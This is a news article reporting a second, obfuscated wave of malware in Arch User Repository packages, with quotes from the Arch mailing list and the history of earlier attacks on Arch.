Just hours after Arch sounded the all‑clear on a massive AUR malware purge, a new, stealthier campaign is slipping malicious code back into user packages.
Yesterday morning at about 10:30 EDT I told you that AUR’s malware attack had ended, that more than 1,500 packages containing malware had been found and removed, and that the accounts of the folks who submitted the package had been deleted. If memory serves, I think I said something like, “It’s safe to go back in the water.”
Guess what? The sharks have returned. It’s time to get out of the water.
“Here we go again, now with obfuscated code,” a user with the handle a821 posted to Arch Linux’s email list at about 7:30 pm EDT yesterday, along with a list of more than 50 infected packages.
Then about 3:30 am EDT, Nicolas Boichat posted, “There’s a new wave (detected using my local Gemma E2B model FWIW). It’s a little bit more elaborate.”
Basically, this time the bad guys have added a small hidden program that runs after installation and which is purposefully written in a way to make it difficult to detect. In plain English, it tells the computer to go to the temporary folder, then silently download and install some JavaScript code from the internet.
In other words, not only are the cracker sharks back, they’ve upped their game — or this is an entirely new shiver of more sophisticated copycat sharks.
AUR, or Arch User Repository, is a special respository that allows Arch users to make software available to other users that’s not in Arch’s official repository. As such, it’s never the safest place in the world to grab software, so even under the best of circumstances users are cautioned to be careful, or to “trust but verify.”
Since these latest waves of malware infestation started on the 12th, there’s been talk of making AUR read only until the problem is rectified, but nothing has come of that… at least, not yet. This morning, Phoronix’s Michael Larabel suggested that Arch just shut AUR down until the situation is rectified.
This is hardly Arch’s first battle with bad actors. Last August it was hit with rounds of DDOS attacks against not only the AUR repository, but also the main Arch Linux website and community forums, which caused partial outages and intermittent connectivity problems for several weeks.
Christine Hall has been a journalist since 1971. In 2001, she began writing a weekly consumer computer column and started covering Linux and FOSS in 2002 after making the switch to GNU/Linux. Follow her on Twitter: @BrideOfLinux
Be First to Comment